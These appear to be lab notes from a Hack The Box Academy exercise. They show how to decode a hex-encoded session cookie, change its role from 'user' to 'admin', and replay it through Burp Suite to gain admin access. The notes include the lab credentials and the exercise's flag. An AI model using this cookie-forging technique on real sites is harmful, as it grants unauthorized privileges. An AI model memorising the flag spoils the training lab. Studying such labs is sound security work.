TAMPERING/FORGING SESSION TOKENS

#identify pattern or encoding
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input

BURP > Proxy
 Request
 ...
  POST /index.php HTTP/1.1
  Host: 83.136.254.158:52415
  Origin: http://83.136.254.158:52415
  Content-Type: application/x-www-form-urlencoded
  Referer: http://83.136.254.158:52415/index.php

  username=htb-stdnt&password=AcademyStudent%21
  
 * send to repeater

#send multiple login requests and take note of the session tokens assigned
#try to identify the pattern or if only a portion of the token is random
BURP > Repeater
 Request
 ...
  POST /index.php HTTP/1.1
  Host: 94.237.61.84:50122
  Origin: http://94.237.61.84:50122
  Referer: http://94.237.61.84:50122/

  username=htb-stdnt&password=AcademyStudent%21
 Response
 ...
  HTTP/1.1 302 Found
  Date: Thu, 26 Dec 2024 00:29:27 GMT
  Server: Apache/2.4.59 (Debian)
  Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572
  Location: /admin.php
  ...

root@oco:~$ echo -n 757365723d6874622d7374646e743b726f6c653d75736572 | xxd -r -p
 user=htb-stdnt;role=user

#tamper/forge token
root@oco:~$ echo -n 'user=htb-stdnt;role=admin' | xxd -p
 757365723d6874622d7374646e743b726f6c653d61646d696e
 
#relog while the current session is active/attached or cached
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input
 
BURP > Proxy
 Request
 ...
  GET / HTTP/1.1
  Host: 94.237.61.84:50122
  Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572

 * right-click on the request > Do intercept > Response to this request
 * HTB{d1f5d760d130f7dd11de93f0b393abda}